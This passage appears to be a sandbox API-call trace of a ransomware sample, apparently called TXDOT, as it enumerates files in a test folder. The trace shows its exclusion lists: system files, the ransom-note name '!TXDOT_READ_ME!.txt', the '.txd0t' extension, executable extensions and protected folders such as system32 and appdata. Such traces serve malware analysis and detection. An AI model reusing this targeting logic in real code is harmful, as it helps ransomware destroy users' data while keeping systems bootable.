StrCmpW (psz1="UiInfo.xml", psz2="..") returned 1 [0086.834] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0086.834] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0086.834] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="UiInfo.xml", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" [0086.834] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0086.834] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.834] StrCmpIW (psz1="UiInfo.xml", psz2="bootsect.bak") returned 1 [0086.834] StrCmpIW (psz1="UiInfo.xml", psz2="iconcache.db") returned 1 [0086.834] StrCmpIW (psz1="UiInfo.xml", psz2="thumbs.db") returned 1 [0086.834] StrCmpIW (psz1="UiInfo.xml", psz2=" ransomware ") returned 1 [0086.834] StrCmpIW (psz1="UiInfo.xml", psz2=" ransom ") returned 1 [0086.834] StrCmpIW (psz1="UiInfo.xml", psz2="debug.txt") returned 1 [0086.834] StrCmpIW (psz1="UiInfo.xml", psz2="boot.ini") returned 1 [0086.835] StrCmpIW (psz1="UiInfo.xml", psz2="desktop.ini") returned 1 [0086.835] StrCmpIW (psz1="UiInfo.xml", psz2="autorun.inf") returned 1 [0086.835] StrCmpIW (psz1="UiInfo.xml", psz2="ntuser.dat") returned 1 [0086.835] StrCmpIW (psz1="UiInfo.xml", psz2="ntldr") returned 1 [0086.835] StrCmpIW (psz1="UiInfo.xml", psz2="ntdetect.com") returned 1 [0086.835] StrCmpIW (psz1="UiInfo.xml", psz2="bootfont.bin") returned 1 [0086.835] StrCmpIW (psz1="UiInfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.835] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0086.835] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.835] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0086.835] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.835] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\Client\\UiInfo.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" [0086.835] SetEvent (hEvent=0x410) returned 1 [0086.835] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0086.835] FindClose (in: hFindFile=0xec2170 | out: hFindFile=0xec2170) returned 1 [0086.835] GetProcessHeap () returned 0xe30000 [0086.835] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.835] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0086.835] StrCmpW (psz1="DHtmlHeader.html", psz2=".") returned 1 [0086.835] StrCmpW (psz1="DHtmlHeader.html", psz2="..") returned 1 [0086.835] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.835] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.835] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="DHtmlHeader.html", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned="C:\\588bce7c90097ed212\\DHtmlHeader.html" [0086.835] PathFindExtensionW (pszPath="DHtmlHeader.html") returned=".html" [0086.835] StrCmpW (psz1=".html", psz2=".txd0t") returned -1 [0086.835] StrCmpIW (psz1="DHtmlHeader.html", psz2="bootsect.bak") returned 1 [0086.835] StrCmpIW (psz1="DHtmlHeader.html", psz2="iconcache.db") returned -1 [0086.835] StrCmpIW (psz1="DHtmlHeader.html", psz2="thumbs.db") returned -1 [0086.835] StrCmpIW (psz1="DHtmlHeader.html", psz2=" ransomware ") returned 1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2=" ransom ") returned 1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="debug.txt") returned 1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="boot.ini") returned 1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="desktop.ini") returned 1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="autorun.inf") returned 1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="ntuser.dat") returned -1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="ntldr") returned -1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="ntdetect.com") returned -1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="bootfont.bin") returned 1 [0086.836] StrCmpIW (psz1="DHtmlHeader.html", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.836] PathFindExtensionW (pszPath="DHtmlHeader.html") returned=".html" [0086.836] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".html") returned 0x0 [0086.836] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0086.841] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.841] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\DHtmlHeader.html", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html") returned="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" [0086.841] SetEvent (hEvent=0x408) returned 1 [0086.841] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0086.841] StrCmpW (psz1="DisplayIcon.ico", psz2=".") returned 1 [0086.841] StrCmpW (psz1="DisplayIcon.ico", psz2="..") returned 1 [0086.841] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.841] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.841] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="DisplayIcon.ico", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned="C:\\588bce7c90097ed212\\DisplayIcon.ico" [0086.841] PathFindExtensionW (pszPath="DisplayIcon.ico") returned=".ico" [0086.843] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="bootsect.bak") returned 1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="iconcache.db") returned -1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="thumbs.db") returned -1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2=" ransomware ") returned 1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2=" ransom ") returned 1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="debug.txt") returned 1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="boot.ini") returned 1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="desktop.ini") returned 1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="autorun.inf") returned 1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntuser.dat") returned -1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntldr") returned -1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="ntdetect.com") returned -1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="bootfont.bin") returned 1 [0086.843] StrCmpIW (psz1="DisplayIcon.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.843] PathFindExtensionW (pszPath="DisplayIcon.ico") returned=".ico" [0086.843] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.843] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Extended", cAlternateFileName="")) returned 1 [0086.843] StrCmpW (psz1="Extended", psz2=".") returned 1 [0086.843] StrCmpW (psz1="Extended", psz2="..") returned 1 [0086.843] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.843] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.843] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Extended", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0086.843] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\system32\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\system\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\local\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\boot\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\perflogs\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\programdata\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\drivers\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\wsus\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="crypt_detect") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="cryptolocker") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="ransomware") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\WINDOWS") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\Program Files") returned 0x0 [0086.844] GetProcessHeap () returned 0xe30000 [0086.844] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0xed76e0 [0086.844] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0086.844] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\*", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\*") returned="C:\\588bce7c90097ed212\\Extended\\*" [0086.844] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26b0 [0086.844] StrCmpW (psz1=".", psz2=".") returned 0 [0086.844] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.845] StrCmpW (psz1="..", psz2=".") returned 1 [0086.845] StrCmpW (psz1="..", psz2="..") returned 0 [0086.845] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0086.845] StrCmpW (psz1="Parameterinfo.xml", psz2=".") returned 1 [0086.845] StrCmpW (psz1="Parameterinfo.xml", psz2="..") returned 1 [0086.845] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0086.845] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0086.845] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="Parameterinfo.xml", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" [0086.845] PathFindExtensionW (pszPath="Parameterinfo.xml") returned=".xml" [0086.845] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="bootsect.bak") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="iconcache.db") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="thumbs.db") returned -1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2=" ransomware ") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2=" ransom ") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="debug.txt") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="boot.ini") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="desktop.ini") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="autorun.inf") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntuser.dat") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntldr") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntdetect.com") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="bootfont.bin") returned 1 [0086.845] StrCmpIW (psz1="Parameterinfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.845] PathFindExtensionW (pszPath="Parameterinfo.xml") returned=".xml" [0086.845] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.845] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0086.881] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.881] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" [0086.881] SetEvent (hEvent=0x3fc) returned 1 [0086.881] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0086.881] StrCmpW (psz1="UiInfo.xml", psz2=".") returned 1 [0086.882] StrCmpW (psz1="UiInfo.xml", psz2="..") returned 1 [0086.882] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0086.882] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0086.882] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="UiInfo.xml", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" [0086.882] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0086.882] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="bootsect.bak") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="iconcache.db") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="thumbs.db") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2=" ransomware ") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2=" ransom ") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="debug.txt") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="boot.ini") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="desktop.ini") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="autorun.inf") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="ntuser.dat") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="ntldr") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="ntdetect.com") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="bootfont.bin") returned 1 [0086.882] StrCmpIW (psz1="UiInfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.882] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0086.882] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.882] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0086.885] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.885] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" [0086.885] SetEvent (hEvent=0x418) returned 1 [0086.885] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0086.885] FindClose (in: hFindFile=0xec26b0 | out: hFindFile=0xec26b0) returned 1 [0086.885] GetProcessHeap () returned 0xe30000 [0086.885] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.885] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Graphics", cAlternateFileName="")) returned 1 [0086.885] StrCmpW (psz1="Graphics", psz2=".") returned 1 [0086.885] StrCmpW (psz1="Graphics", psz2="..") returned 1 [0086.886] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.886] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.886] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Graphics", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\system32\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\system\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\local\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\boot\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\perflogs\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\programdata\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\drivers\\") returned 0x0 [0086.886] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\wsus\\") returned 0x0 [0086.886] StrStrIW 